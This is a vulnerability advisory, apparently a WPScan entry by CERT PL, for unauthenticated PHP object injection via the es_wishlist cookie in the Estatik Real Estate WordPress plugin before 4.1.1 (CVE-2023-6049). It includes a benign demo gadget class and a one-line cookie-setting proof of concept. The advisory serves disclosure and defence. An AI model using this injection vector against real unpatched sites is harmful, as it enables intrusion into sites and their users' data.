Lucene search
Krzysztof Zając (CERT PL)WPEX-ID:8CFD8C1F-2834-4A94-A3FA-C0CFBE78A8B7HistoryDec 25, 2023 - 12:00 a.m.
Estatik Real Estate Plugin < 4.1.1 - Unauthenticated PHP Object Injection
2023-12-2500:00:00
Krzysztof Zając (CERT PL)
39
estatik
real estate
unauthenticated access
php object injection
gadget chain
plugin vulnerability
arbitrary deserialization
Description The plugin unserializes user input via some of its cookies, which could allow unauthenticated users to perform PHP Object Injection when a suitable gadget chain is present on the blog
To simulate a gadget chain, put the following code in a plugin:
class Evil {
public function __wakeup() : void {
die("Arbitrary deserialization");
}
}
Then, run the below command in the developer console of the web browser while being on the blog as unauthenticated and reload the page to see the Arbitrary deserialization message.
document.cookie='es_wishlist=O:4:"Evil":0:{}'Related
cvelist
cvelist
prion
prion
Design/Logic Flaw
2024-01-15 16:15:00
cve
cve
CVE-2023-6049
2024-01-15 16:15:12
nvd
nvd
CVE-2023-6049
2024-01-15 16:15:12
wpvulndb
wpvulndb
Estatik Real Estate Plugin < 4.1.1 - Unauthenticated PHP Object Injection
2023-12-25 00:00:00
7.2 High
AI Score
Confidence
Low
0.003 Low
EPSS
Percentile
69.7%
Related for WPEX-ID:8CFD8C1F-2834-4A94-A3FA-C0CFBE78A8B7